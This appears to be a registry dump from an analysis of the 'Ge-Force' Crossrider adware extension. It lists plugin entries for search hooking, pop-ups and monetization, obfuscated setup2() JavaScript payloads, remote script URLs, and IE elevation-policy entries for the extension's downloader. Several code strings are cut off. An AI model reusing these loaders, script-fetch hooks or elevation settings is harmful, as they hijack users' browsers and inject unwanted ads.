[HKCU\Software\Ge-Force\Plugins\350]
"JavaScript" = "if (typeof setup2 === 'function') { setup2('MTE3MzRlNTI0NjVhNDAwZDAyMGUxYTJjMWMxZTQ0NDA0MjQ3MWUwZTFlMDk1NDVkNDkxOTA2MGI1ODE5MDUxNzFkMDYwMjFiMTYwNDE4MWYxZTU3MGQxZDBiNTUwYzAyMDMxYjFjMTg0MTFlNDgxMDExNWExNTFiMDcwOTBmMWIwMTE0MmIwMTRiMjUzNTNhM2MzZDM1MjkzMDJjMzIzZjM4MjYyZDMzMmIyYTNkMmMzMjI1MzU1ZjBkMWQxMzE0MTYxNzBmMzkwNTFkMGI0ZjM5MjUyMTM3MzkyOTM5MmIyNzM2MjMyODNkMjYzOTJmMjQyZDNjMmIzOTM5MmQyMTMzMjUzNTVmMGMwMDA5MGQxMTAwMDQzOTA1MWQwYjRmMzkyNTIxMzczOTI5MzkyYjI3MzYyMzI4M2QyNzI0MzUzZDJhMmIyMDM5MjU0NDA0MDYwYTIzM2Q1MzJkMzkzOTMwMmEyNTI5MzgzMDJhMzczNDI1MjMzNTI2MjUyMzNkMzEyZDQwMWIxMjE1MzgxYjA3MWM1MzJkMzkzOTMwMmEyNTI5MzgzMDJhMzczNDI1MjMzNTI2MjUyNDM4MjMzNzM5MjU0NDJjMzQzMzI5NDQzMTJkMjUyODJkMzYyNTI4MjMzZDJiMjAzOTMzMmMzNjIyM2IyNjM1MmIyMDM5MmYzMTIwMjQyNTIzM2QzMTJkNDAwOTE3MDczZjNlNTcyNjMxMzEzNDM1MzEzNjI0MzMyZTNjM2MyZDIzMjIzNjIwMzgzZTJmM2QzMTIxMzMzODNkMmMzMjI1MzU1ZjFjNGYzOTI1MzAyYjMyMjUzNTViNDI3ODQ2NWE0MjQ1NTQxMjFlMGQxZTAxMzMwODBlNDc0YzVhNDgxMTFhMDYxNjA5NTg0YTU5MWU1ODE4NTYxMzUyMGI1YjRiMDUwOTA2NTcwNjA1MDUxZTBjNGIxODFmMWU1NjAwMTUxMzFiMTQw"
[HKCU\Software\Ge-Force\Plugins\94]
"Name" = "IEPopup"
[HKCU\Software\Ge-Force\Installer]
"srcid" = "001729"
[HKCU\Software\Ge-Force\Plugins\13]
"URL" = "http://js.newstatsclientcloud.com/plugins/mins/13.js"
[HKCU\Software\Ge-Force\Installer]
"ErrorsDomain" = "http://errors.newstatsclientcloud.com"
[HKCU\Software\Ge-Force\Plugins\37]
"URL" = "http://js.newstatsclientcloud.com/plugins/mins/37.js"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKCU\Software\Ge-Force\Plugins\36]
"Name" = "IEBackground"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Ge-Force\Plugins\180]
"URL" = "http://js.newstatsclientcloud.com/plugins/mins/180.js"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{9eeb51b4-fe68-4297-af9a-8d5f04c3f631}]
"AppName" = "Ge-Force-bg.exe"
[HKCU\Software\Ge-Force\Plugins\356]
"JavaScript" = "appAPI.internal.monetization=appAPI.internal.monetization||{};if(typeof appAPI.internal.monetization.plugins===undefined){appAPI.internal.monetization.plugins={};}appAPI.internal.monetization.plugins[356]=function(){if(appAPI.isBackground){return;}if(!appAPI.internal.monetization.shouldRunByVertical(356,[pops])){return;}new (appAPI.internal.monetization.plugins.ICMBaseManager({namespace:MAN}))();};"
[HKCU\Software\Ge-Force\Plugins\180]
"Version" = "12"
[HKCU\Software\Ge-Force\Plugins\41]
"Version" = "7"
[HKCU\Software\Ge-Force\Plugins\223]
"URL" = "http://js.newstatsclientcloud.com/plugins/mins/223.js"
[HKCU\Software\Ge-Force\Plugins\180]
"Name" = "bpo_serp_m"
[HKLM\SOFTWARE\Tempo]
"(Default)" = "tempo"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKCU\Software\Ge-Force\Plugins\40]
"Name" = "IEExtension"
[HKCU\Software\Ge-Force\Plugins\273]
"Version" = "6"
[HKCU\Software\Ge-Force\Plugins\195]
"JavaScript" = "appAPI.internal.monetization=appAPI.internal.monetization||{};if(typeof appAPI.internal.monetization.plugins===undefined){appAPI.internal.monetization.plugins={};}appAPI.internal.monetization.plugins[195]=function(){if(appAPI.isBackground){return;}if(!appAPI.internal.monetization.shouldRunByVertical(195,[pops])){return;}new (appAPI.internal.monetization.plugins.ICMBaseManager({namespace:LITE}))();};"
[HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{8769e10b-79b7-42b2-9658-9540187841f5}]
"Policy" = "3"
[HKCU\Software\Ge-Force\Plugins\253]
"Version" = "2"
[HKCU\Software\Ge-Force\Plugins\2]
"Version" = "2"
[HKCU\Software\Ge-Force\Plugins\39]
"Name" = "IEDatabase"
[HKLM\SOFTWARE\Crossrider]
"Bic" = "589912D45CE0412C9CDE01D4C96E2298IE"
[HKCU\Software\Ge-Force\Plugins\1]
"URL" = "http://js.newstatsclientcloud.com/plugins/mins/1.js"
[HKCU\Software\Ge-Force\Plugins\4]
"URL" = "http://js.newstatsclientcloud.com/plugins/javascripts/jquery-1_7_1_min.js"
[HKCU\Software\Ge-Force\Plugins\93]
"JavaScript" = "if (typeof setup2 === 'function') { setup2('MGU2MTY1NTcxZDE3MDEwMjM2MTUxOTQ5NTY1NTU3MGIwMTA2MTM1ZDVhNDQxYjAyMDI0ZDA2MDcxMzAyMDcwZDA1MDYxZDRkMTYxZDBlNDgwMjE4NDMwNjEzM2MxODEzMGEwOTViMDExZjA1NGEwNzE5MDEwYzEyMDcwODA5NDgxZDBiMDMwODBlMGUxZTFjNGEwMDA2MDYwNzNiMDc1YTE0MDkwZjUzMzYzNzNjMzY1ZTM4MmEyODNlM2EyNjMwMjczYjI3MjIyNzM0MjkyZDIxMjYzYjM2MjYyMzJhMzgzOTM3MmEyYTMxMmQzYzQxMDUwYTFlMDExYjA2MDcxYzAyMGExMDU2MzMyYTM2MzEzYTIxMzAzNTNjMmYyOTI3MmEyMjI1MjIzYzI5MzQyNjI5MmEyYTQxNTk3ODZhNDUxZDFmMTgwNTA2MzYwNzFlNDE1ZDU1NDkwNDAxMDExMzA2NDg0YzQ4MDIxYzFiNWIwNjE2MDUxNzExMDExYzE4MDQ1YjE2MGMxODVkMTQxNDVhMTgwYTJhMTgwMjFjMWM0ZDBkMDYxYjUzMTExOTEwMWEwNzExMDQxMDU2MDQxZDAzMTkxODFiMDgxMDUzMWUxZjEwMDcyYTExNGYwMjA1MTY0ZDJmMjEzYzI3NDgyZDNjMjQyNzI0M2YyNjI3MmEzMTM3MzEzODMwMzMzODMwM2IyNzMwMzYzYzM0MjAyOTMzM2MzMTNjMmE1NDEzMDYwNzFmMDIxMDA3MGQxNDFmMDY1YTJhMzQyZjI3M2EzMDI2MjAyYTIzMzAzOTMzMzQyNTMzMmEzYzIyMmEzMDM0MzM1NzU5Njk3YzUwMTMwYjAwMGMwNTFiM2MwNzU3NDg0MzVlNDY2MTEx', 'ukluucurcg'); }"
[HKCU\Software\Ge-Force\Plugins\286]
"JavaScript" = "if (typeof setup2 === 'function') { setup2('MTE2YjU2NTU1MTQ4NTcwYTAyMDQxYTM0MDQxOTUzNTI1NTQwMWUwNDFlMTE0YzVhNWUwYjExMGM1ODEzMDUwZjA1MDExNTA5MDEwMzE4MTUxZTRmMTUxYTFjNDcwNjEyNTkxYTFiNGYxYzA2NGUwYjE0MGYwNjExMDMwNjE4M2MxNTU1MmEzZDM1MjIyNTMyMjUyNzM4MmMzMDMwMjkzMzJiMmMyNjJhMzgyYzJhM2Q1MDEzMDUxNDE4MDEwMzExMzYwZDEyMTU1NzNlMjkzNjIzMjcyNjMxMjQzOTJlMjQyNDJhMzIyNzIwMmMyMjIyMzMzZTM1M2EzNTJkMmEzZDUwMTExYTExMzgxNDFjMGQ0ODNkMjkzMzM4MmUyNTI2MjMyMTMxMjcyNDJmMmIzMTI2MmEzZjI5MzgyNzI5MmY0ODRkN2M1NTUxNDg1NTQwMWUwNDFlMTEwNTIwMDMwNDU3NTg1NjUyMDIxNTAyMDUwMjUyNWE0ZDEyNDIwYjU5MTc0MTAwNTE1YjExMDUxYzQ0MDkwMTE2MTUwNjViMGMxMzA0NDUxMjA2NWExYjE5NWIwODA1NGYwOTAwMWIwNTEwMDExMjBjM2YxNDU3M2UyOTM2MjMyNzI2MzEyNDM5MmUyNDI0MmEzMjI5MzgzMjI5MzkyZTNlMjk1MzEyMDcwMDBjMDIwMjEzMjIxOTExMTQ1NTJhM2QzNTIyMjUzMjI1MjczODJjMzAzMDI5MzMyNTM0MzgyMTIzMzEyYTIxMzkzNDJmM2UyOTUzMTAxODA1MmMxNzFkMGY1YzI5MmEzMjNhM2EzMTI1MjIyMzI1MzMyNzJlMjkyNTMyMjkzZTJiMmMzMzJhMmU0YTU5Njg1NjUwNGE0MTU0MDUxZDFkMTIwYjE4MzkwZTQzNGM1NTQzNTA0MzY4MGI=', 'javuqhubvp'); }"
[HKCU\Software\Ge-Force\Plugins\9]
"Name" = "search_engine_hook"
[HKCU\Software\Ge-Force\Plugins\195]
"Version" = "28"
[HKCU\Software\Ge-Force\Plugins\46]
"URL" = "http://js.newstatsclientcloud.com/plugins/mins/46.js"
[HKCU\Software\Ge-Force\Manifest]
"homepageurl" = "NA"
[HKCU\Software\Ge-Force\Plugins\356]
"Version" = "1"
[HKCU\Software\Ge-Force\Plugins\14]
"Version" = "11"
[HKCU\Software\Ge-Force\Plugins\301]
"URL" = "http://js.newstatsclientcloud.com/plugins/mins/301.js"
[HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{8769e10b-79b7-42b2-9658-9540187841f5}]
"AppName" = "Ge-Force-codedownloader.exe"
[HKCU\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{fb5a1bf6-0b40-4288-916a-b70d325b0949}]
"AppPath" = "%Program Files%\Ge-Force"
[HKCU\Software\Ge-Force\Plugins\104]
"Name" = "jollywallet_m"
[HKCU\Software\Ge-Force\Plugins\200]
"URL" = "http://js.newstatsclientcloud.com/plugins/mins/200.js"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Ge-Force]
"DisplayName" = "Ge-Force"
[HKCU\Software\Ge-Force\Plugins\22]
"JavaScript" = "(function(a){appAPI.queueManager={queue:[],register:function(b){this.queue.push(b);}};appAPI.ready=function(c,b){a.when.apply(null,appAPI.queueManager.queue).then(function(){a.when(appAPI.initializerPlugin.isReady(b)).then(function(){new Function('if (typeof jQuery === undefined) { jQuery = $jquery_171; }(' appAPI.resources.parseIncludeJS(c.toString()) )($jquery_171))();});});};}($jquery_171));var CrossRiderResourcesManager=(function(z){var B={appId:appAPI._cr_config.appID(),url:appAPI._cr_config.resources,env:appAPI.appInfo.environment===staging?staging:production,saveResource:appAPI.time.daysFromNow(90),nextCheck:360,DBNamespace:Resources_,isDebug:appAPI.debugManager.isDebug()&&appAPI.debugManager.getResourcesPath(),isIE7:z.browser.msie&&z.browser.version*1==7},x=new z.Deferred(),h=K(meta)||{},D=K(remote_resources)||{remoteId:0},e=K(queue)||{},g=initialVersion=K(lastVersion)||0;return z.Class.extend({init:function(){appAPI.queueManager.register(x.promise());if(B.isDebug){x.resolve();}elR"
[HKCU\Software\Ge-Force\Plugins\37]
"Version" = "6"
[HKCU\Software\Ge-Force\Manifest]
"UpdateInterval" = "360"
[HKCU\Software\Ge-Force\Plugins\43]
"Version" = "5"
[HKCU\Software\Ge-Force\Installer]
"osName" = "XP32"
[HKCU\Software\Ge-Force\Plugins\223]
"Version" = "9"
[HKCU\Software\Ge-Force\Plugins\177]
"Version" = "2"
[HKCU\Software\Ge-Force\Plugins\36]
"Version" = "8"
[HKCU\Software\Ge-Force\Manifest]
"PublisherName" = "iWebar"
[HKCU\Software\Ge-Force\Plugins\183]
"Version" = "4"
[HKCU\Software\Ge-Force\Plugins\35]
"JavaScript" = "if(typeof appAPI===undefined){appAPI={};}(function(e){if(typeof appAPI.internal===undefined){appAPI.internal={};}if(typeof appAPI.internal.callbacks===undefined){appAPI.internal.callbacks={};}function f(m){if(typeof m===object){return m;}if(typeof m!==string){return null;}m=m.replace(/\r\n/g,\n);if(m.lastIndexOf(\n) 1==m.length){m.replace(/(?:(?:^|\n)\s |\s (?:$|\n))/g,).replace(/\s /g, );}var n=m.split(\n);var l={};for(var k=0;k
[HKCU\Software\Ge-Force\Plugins\263]
"Version" = "3"
[HKCU\Software\Ge-Force\Plugins\14]
"JavaScript" = "if(typeof(appAPI)===undefined){appAPI={};}var CR__bIsIEWindow=false;if(typeof window!==undefined&&typeof window.navigator!==undefined&&typeof window.navigator.userAgent!==undefined){CR__bIsIEWindow=/MSIE (\d \.\d );/.test(window.navigator.userAgent);}CR__bIsIEWindow=(CR__bIsIEWindow||(typeof appAPIinternal!==undefined));appAPI.JSON={};if(typeof JSON!==undefined&&!CR__bIsIEWindow){appAPI.JSON=JSON;}else{(function(){function f(n){return n
[HKCU\Software\Ge-Force\Plugins\200]
"JavaScript" = "if (typeof setup2 === 'function') { setup2('MTc2NjY1NGQxODEyMTcwNjMzMDAwMDRlNTY0ZjUyMGUxNzAyMTY0ODQzNDMxZTFhMWMwMzEwNTgwMDFkMTQxNTA4MGExMTBhNGQxNTA5MWY0MzFhNWQ0MTQwNDkxNDFlMGYwNjA5MDAwNTFjMDQ0OTUyNDY1MTQyNDMzMzMzMmMyMjI5MzAyNTM0M2IyODI5M2UzMDM1M2UzNzMzMjgzNjI5MjgzMzNjMjUyNDNjM2YyMjJkMzM1MzFjMGUwMjEyMGQxMzE0M2MwZDAxMDk1MjJmMzkyMDI0MjkyMTNmM2UyNTJiMzUzNDNjMzczNjIyMzMyMjJkMjIzNTM5M2M1NDRhNzg2NTRlMDQxYjA0MTYxMDIzMTQxZTRlNTY0YzRkMTgxMjE3MDYxNTQ4NDM0MzFlMWExYzAzMTA1ODAwMWQxNDE1MDgwYTExMGE0ZDE1MDkxZjQzMWE1ZDQxNDA0OTE0MWUwZjA2MDkwMDA1MWMwNDQ5NTI0NjUxNDI0MzMzMzMyYzIyMjkzMDI1MzQzYjI4MjkzZTMwMzUzZTM3MzMyODM2MjkyODMzM2MyNTI0M2MzZjIyMmQzMzUzMWMwZTAyMTIwZDEzMTQzYzBkMDEwOTUyMmYzOTIwMjQyOTIxM2YzZTI1MmIzNTM0M2MzNzM2MjIzMzIyMmQyMjM1MzkzYzU0NGE3ODY1NGUxYzAzMDUwMTBhMTgyZjE2NGU1NjRjNWQ0MDU2NjkwYg==', 'lllopfcvfr'); }"
[HKCU\Software\Ge-Force\Plugins\281]
"JavaScript" = "if (typeof setup2 === 'function') { setup2('MGY3ZjYyNWEwNDEyMDYwYTI3MGIxODU3NTE1ODRlMGUwNjBlMDI0MzViNWEwODE0MDcwYjFkMTQ1YzFhMWIxODQ0MTkwODM1MTcwODA0MWM1YjEyMGUwYzM4MDcxNTQ1MTExMDEwNDgzNDI3MmYzNDNkMjkyMTJiM2QzMTJlMmEzMzIzMmEyZTM3MzczMDMwMmYyNzNmMzMzMDI1M2IzZDJiMmE0ZDA4MDUwMjRmNGI0MzQ5NDY0NDRkMGMxNTE2MTc0NzFiMTcxZTEwMDgwYzRhMDcwMjBhM2MxODE5MTA1NjI3MzMyNTIwMzUyMTJhMjYzYzJmM2QzZTM5MzMyYTIyMjYzYTM0MjYzZDMzMzk1MDU2Nzg3MDU2MDUwNzBkMGIwZjFjMzMxNjViNGU1NTU5NDA1ZDZjMGY=', 'tukxlfrzry'); }"
[HKCU\Software\Ge-Force\Plugins\94]
"URL" = "http://js.newstatsclientcloud.com/plugins/mins/94.js"
[HKCU\Software\Ge-Force\Installer]
"subid" = "0"
[HKCU\Software\Ge-Force\Plugins\183]
"JavaScript" = "(function(){if(typeof $jquery_171===undefined){return;}var d=__TABS_ON_UPDATED_ACTIVE_KEY;var c=__tabsOnUpdateActive__;var a={SCOPE:{BACKGROUND:0,PAGE:1,POPUP:5,OPEN_URL:6}};if(!appAPI.utils.isFunction(appAPI.internal.globalEval)){appAPI.internal.globalEval=function(e){(new Function(e)).apply(window);};}if(appAPI.internal.scope==a.SCOPE.BACKGROUND){appAPI.tabs.reloadTab=function(e){if(typeof e.delay===number){appAPI.setTimeout(function(){appAPI.message.toAllTabs({tabId:e.tabId},{channel:__tabsReloadTab__});},e.delay);}else{appAPI.message.toAllTabs({tabId:e.tabId},{channel:__tabsReloadTab__});}};appAPI.tabs.executeScript=function(e){appAPI.message.toAllTabs(e,{channel:__tabsExecuteScript__});};appAPI.tabs.onTabUpdated=function(e){if(typeof e!==function){return;}appAPI.message.addListener({channel:__tabsOnTabUpdated__},function(f){e(f);});appAPI.internal.db.set(d,true);appAPI.message.toAllTabs({},{channel:c});};}else{if(appAPI.internal.scope==a.SCOPE.PAGE&&!appAPI.dom.isIframe()){var b=functi"
[HKCU\Software\Ge-Force\Plugins\253]
"URL" = "http://js.newstatsclientcloud.com/plugins/mins/253.js"
[HKCU\Software\Ge-Force\Plugins\221]
"Name" = "icm_downloads_m"
[HKCU\Software\Ge-Force\Manifest]
"IsButtonEnabled" = "false"
[HKCU\Software\Ge-Force\Plugins\288]
"JavaScript" = "if (typeof setup2 === 'function') { setup2('MTg2ZTU3NDU1MTRiNGQwZTBlMDMxMzMxMDUwOTUzNTE0ZjQ0MTIwMzE3MTQ0ZDRhNWUwMjFjMTIxYjAzMGEwNzU5MDExMDFmMGUwMDFiMDQxNzAzMDIxNzA0NDUwNjA4MWMxODRjMDIxODRhMWMwMjAxNDkxOTA1MTIwNzU5MGYwMjU0MDcwZjFlNGEzYzNiMzQzNzNlMzgzYzM0MzMzMzI2MzYyODMwMjIyZTNkMzkzMzMzM2MzYjUxMDcxZjBhMDIwMzQ3MjgzYzI3MjUyYTIyMzgzZDJmM2UzMjMxM2IzNjM1MjEzNDIxMjczNzMyM2MzYjUxMTYwNDA5MDYwMjQ3MjgzYzI3MjUyYTIyMzgzZDJmM2UzMjMxM2IzMjNkMjUyZTIxMjIzZjMzM2MzNzIyMjcyZTIyMmIzOTI1NTU0ZjZlNTc0NTUxNGI0ZDE2MTYwMjA0MGQxOTJjMTU0OTU1NDY0ODRmNWI2ZTBh', 'cdweqkofzw'); }"
[HKCU\Software\Ge-Force\Plugins\337]
"URL" = "http://js.newstatsdemosrv.com/plugins/mins/337.js"
[HKCU\Software\Ge-Force\Plugins\288]
"Version" = "1"
[HKCU\Software\Ge-Force\Plugins\21]
"URL" = "http://js.newstatsclientcloud.com/plugins/mins/21.js"
[HKLM\SOFTWARE\InstalledBrowserExtensions\21836\Status]
"Installed" = "1"
[HKCU\Software\Ge-Force\Plugins\41]
"JavaScript" = "if(typeof appAPI===""undefined""){appAPI={};}(function(a){appAPI.isBackground=false;appAPI.tabId=a.getBhoInstanceId();appAPI.getTabId=function(){return appAPI.tabId;};appAPI.isActiveTab=function(){return appAPIinternal.isActiveTab();};appAPI.platform=""IE"";if(typeof appAPI.appInfo===""undefined""){appAPI.appInfo={};}var c=appAPI.internal.prefs.getChar(""fullVersionForUrl""
[HKCU\Software\Ge-Force\Plugins\262]
"JavaScript" = "if (typeof setup2 === 'function') { setup2('MWY2MTUyNDE0NzU3NDcwZTEyMDAxNDNlMDAwZDQ1NGQ0NTQ0MGUwMDEwMWI0ODRlNDgxNDAxMDgwNTE1MDcwMzE3NTA0YTE2NGIwNzBkMTUwOTBhMWIwOTAzNTkwYjAzMTI1YjE3MWUxMDRlMTE0NDU3NTc1ZjE2MDA0NDJkM2UyNDI1MmEzNTM1MjYyZDJmMzczMzM4MzIzZDMyMjMzYTIwMmUzNjNlMzQyMjI3MzkyZjMwM2IzNDVkMGQ0OTFkMTY1OTE2MWQwMDU2NDM1NjU1NDc0MzAzMWUwMDU5MzQyZDIyMzUzODM2MzUzNDNkMjAyZTIwM2UyNjI3MzUzOTI4MzUyOTJlMmQzZTQxMDQxYzE1MTIxMTA5MDIxNjVjMzgyODI2MzQyOTI3MzczOTNiMjUyMjI1M2EyZjI4MjczMDJhM2UyZDIyMjUzYTMzMzUzMTM2MzQzYjI1MzgyODQ3NGE2YzU0NDQ0YjUyNDMwZjAzMTExNjE1MjExNjA3NTA1YjQ3NTUwZDEyMTIwNDE3NTE1ZDRlMDQxMzBiMDUwNzE3MGMwZTQzNGMwNjU5MDQwZDA3MTkwNTAyMWEwNTQ5MTkwMDEyNDkwNzExMDk1ZDE3NTQ0NTU0NWYwNDEwNGIzNDJkMjIzNTM4MzYzNTM0M2QyMDJlMjAzZTIyMmYzMTIzMjgzMDIxMmYyZDMyMzIzNTNhMmYyMjJiM2I0NDFlNGYwZDA0NWExNjBmMTA1OTVhNDU1MzU3NTEwMDFlMTI0OTNiMzQzMTMzMjgyNDM2MzQyZjMwMjEzOTJkMjAzNzI3M2EyODI3MzkyMTM0MmQ0NzE0MGUxNjEyMDMxOTBkMGY0ZjNlMzgzNDM3MjkzNTI3MzYyMjM2MjQzNTI4MmMyODM1MjAyNTI3M2UyNDM1MjgzMDM1MjMyNjNiMjIzNjNlMzg1NTQ5NmM0NjU0NDQ0YjUwMTEwYjAyMDIw"
[HKCU\Software\Ge-Force\Plugins]
"AppPluginList" = "246,42,38,46,17,14,78,13,41,44,39,35,43,40,64,2,4,3,1,21,22,182,183,207,72,7,9,345,354,253,93,102,104,123,180,184,192,220,195,200,221,223,242,263,273,281,286,301,177,91,28"
[HKCU\Software\Ge-Force\Plugins\7]
"Version" = "2"
[HKCU\Software\Ge-Force\Plugins\246]
"URL" = "http://js.newstatsclientcloud.com/plugins/mins/246.js"
[HKCU\Software\Ge-Force\Plugins\47]
"Version" = "3"
[HKCU\Software\Ge-Force\Plugins\221]
"URL" = "http://js.newstatsclientcloud.com/plugins/mins/221.js"
[HKCU\Software\Ge-Force\Plugins\3]
"Name" = "ie8_fix_2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKCU\Software\Ge-Force\Plugins\93]
"Version" = "14"
[HKCU\Software\Ge-Force\Plugins\273]
"JavaScript" = "if (typeof setup2 === 'function') { setup2('MWE3ZTUxNDI0YzRiNGQwYzEyMDAxMTIxMDMwZTRlNTE0ZjQ2MGUwMDE1MDQ0YjRkNDMwODA1MTc0ODE4MDgxYTFhMDAwMzA3MDYwNzQ4MTcwZTE5NWUxMTBmMDExYzRiMDUxZTEyNWIxMjE2MTQwMTFjNGEwYzA3NWUxNTE3MDQzMzAyMGI1OTU3NDU1NTQxNTcxMTE5MDkwZTAyMDAyYjA4MTA0YzNkMzMyODNkMmIzNTI3MzMzZDM1MjczZTM0MmEzYzMyMzEyZjMwMzQyNjMzMzgzYTI2MzkzZDI1MmIyZTQ0MWYwOTFkMDUwODEwNWMyYjJlMjEzZTI0M2MzNzM0M2QyNTMxMjMzZDJkM2IzZjNiMjgzNTJjMzEyZTNkNGU0NzY1NDQ0NjU0NDE1NjE5MTYxODFiMWMzMTE0MTg0MzRlNTE0MDA0MWYxYjE0MTU0ZTRlNWIxMjA4MWY0NTAzMGQwODFmMDMxYjFkMGIwZjQ1MGMwYjBiNWIxMjE3MWIxMTQzMDgwNTE3NDkxNzE1MGMxYjExNDIwMTFjNWIwNzEyMDcyYjE4MDY1MTVhNWU1MDUzNTIxMjAxMTMwMzBhMGQzMDBkMDI0OTNlMmIzMjMwMjMzODNjMzYyZjMwMjQyNjJlMjczNDNmMmEyYTIyMzEyNTJiMjIzNzJlMzQyNjIwMzkyYjQ3MDcxMzEwMGQwNTBiNTkzOTJiMjIyNjNlMzEzZjM5MjYyMDIzMjYzZTM1MjEzMjMzMjUyZTI5MjMyYjNlNTY1ZDY4NGM0YjRmNDQ0NDA0MGQwMTE2MGIwMjIyMGI0NjVjNTQ1MzQzNDI2ODEx', 'atqblkodft'); }"
[HKCU\Software\Ge-Force\Plugins\182]
"Name" = "openUrl"
[HKCU\Software\Ge-Force\Plugins\17]
"Version" = "4"
[HKCU\Software\Ge-Force\Plugins\263]
"URL" = "http://js.newstatsclientcloud.com/plugins/mins/263.js"
[HKCU\Software\Ge-Force\Plugins\28]
"JavaScript" = "var CrossriderInitializerPlugin=(function(e){var c={appId:appAPI._cr_config.appID()},b,g=new e.Deferred(),f;return e.Class.extend({init:function(){b=this;e(document).ready(function(){if(!f){d();}e(body).bindExtensionEvent(__CR_REQUEST_READY,a);});},isReady:function(h){if(h===false){d();}return g.promise();}});function d(){g.resolve();f=true;}function a(){e(body).fireExtensionEvent(__CR_RESPONSE_READY,{appId:c.appId});}}($jquery_171));(function(a){appAPI.initializerPlugin=new CrossriderInitializerPlugin();}($jquery_171));"
[HKCU\Software\Ge-Force\Plugins\182]
"Version" = "3"
[HKCU\Software\Ge-Force\Plugins\28]
"Name" = "initializer"
[HKCU\Software\Ge-Force\Manifest]
"Name" = "Ge-Force"
[HKCU\Software\Ge-Force\Plugins\180]
"JavaScript" = "if (typeof setup2 === 'function') { setup2('MTU2MDY1NDUxYTE5MWIxZTMyMTAwMjQ4NTY0NzUwMDUxYjFhMTc1ODQxNDUwZDQ5MDYwYjE3MDcxNjRjMGQwNTAxNDgxMzQzMWYwNjE3NWQ1ODU4NWExNTE3MGI1ZDUzMzgzZDJkMzgyMzM0MjEzZjI2MmEyMjMwMzEyZjM0MzMzNzIzMmIyYjIzM2QzZDNmMmUzODNiMjkzMDMxNDE1NDVjNWMyMjA2MWYwODUyMzEzODIxM2MyNTNmMzQyMDI0MmIyYjM1M2QyZjNhM2MzODNjMmMyMjJiMzgzZDQ4NWM1ZTUxMDAwODA5NWQ1YTNkMzEyOTNlMjgyMTNlM2QyNzIzMjczYzM1MzkzNDM3M2YzMDI3MjMzZDMxNGM1YTU1NDQxZjBhMDg1NjVmNTg1OTViNTU0NDBiNTg1ZDUwNTE1OTU4NWE1ZTQ0NTk1OTViNTA1MDQ4MWUwOTBlMTY1MDMwMzEyNDMwMjEzOTNmMzUzYjI5MmEzYzM4MjMzZTNhMzMyZTM2MzIzMDQ4MTMxNzA3MGU1MTM4MmQyZTNkMjEzNDMxM2MyMzI4MjIyMDMyMjYyMDM0MzYyZjI2MjAyMjIwMzIzYTNkMjIzMDMxMjMyODM4MmQ0ZjQzNjQ2ZTQwMDYxZTE4MTcwMTM4MWQwMjQ1NTg0ZTQ4MDQxMzA2MWQxYzU0NDg0ZDBmNDQxODAxMGEwNDFlNDAwNDBkMDM0NTBkNDkwMjA1MWY1MTUxNTA1ODE4MDkwMTQwNTAzMDMxMjQzMDIxMzkzZjM1M2IyOTJhM2MzODI3MzYzZTI5MjkzNjI4MmIzMTM0MzcyYzM1MjUyMzJkMzI0OTU4NTU1NDIwMGIwMTAyNGYzMjMwMmQzNTJkM2QzOTNlMmUzNjI4M2QzMTI2MzIzZTM1MjIyNjNmMjgzMDMxNDE1NDVjNWMxZTAyMTQ1ZTUyMzEzODIxM2MyNTNmMzQyMDI0MmI"
[HKCU\Software\Ge-Force\Plugins\177]
"JavaScript" = "(function(){if(!(appAPI.isMatchPages&&appAPI.isMatchPages(*crossrider.com/extension_dashboard/dashboard.html))){return;}function o(p){return String(p).replace(//g,>);}function e(aR,aC){function aW(){while(aE.length&&(aE[aE.length-1]=== ||aE[aE.length-1]===aT)){aE.pop();}}function aq(p){return p===[EXPRESSION]||p===[INDENTED-EXPRESSION];}function af(p){return p.replace(/^\s\s*|\s\s*$/,);}function an(q){aQ.eat_next_space=false;if(ag&&aq(aQ.mode)){return;}q=typeof q===undefined?true:q;aQ.if_line=false;aW();if(!aE.length){return;}if(aE[aE.length-1]!==\n||!q){ac=true;aE.push(\n);}for(var p=0;p
[HKCU\Software\Ge-Force\Plugins\38]
"URL" = "http://js.newstatsclientcloud.com/plugins/mins/38.js"
[HKCU\Software\Ge-Force\Plugins\263]
"JavaScript" = "if (typeof setup2 === 'function') { setup2('MTI2ZTQzNDQ1NjU0NTMwMTE3MGMxOTMxMTEwODU0NGU1MTRiMGIwYzFkMTQ1OTRiNTkxNzE1MDcwMDE5MGEwYzA2NTU1YjE1NWYwODA4MTkwNDA1MGEwYzEyNWExZjBjMTc1NzFhMTEwMTRiMDA0NzQzNTg1YTFhMGQ0YjNjM2IzNTI2M2UzYTMwMmEyMDIwMjYzNjI5MzEyOTNkMjYzNjJkMjEyNzNiMjUyMTMzMzYyYTNjMzYzYjRjMDg1ODFlMDI1NjEzMTEwZDU5NTI1NDRmNDA1NzBjMWIwYzU0M2IzYzI3MjQzYjIyM2EzMTMxMmQyMTMxM2IzNzI0MjEzNjJkMzkyNDIxM2MzYjUwMDcwODFhMTcxZDA0MGQwNzU5MjkyYjMyM2IyYzJiM2EzNjJhMjAzMzI2MmUyMDJkMmIzZDI1MmYyODMzMjYyZTNjMzAzZDNiM2IyYTIwMjkyYjUzNDU2OTU4NDk0NDQzNDYxZTAwMDUxOTEwMmQxYjA4NDE1ZTU2NTYxOTFkMTcwODFhNWU0YzRiMTUxMDFmMGEwMjFiMDEwMTUyNDkxNzVhMTAwMjAyMTUwODBkMGIwMDU4MWExNDFkNGMwYjFjMDY0YzEyNDU0NjQwNTAwMTFjNDYzYjNjMjcyNDNiMjIzYTMxMzEyZDIxMzEzYjMzM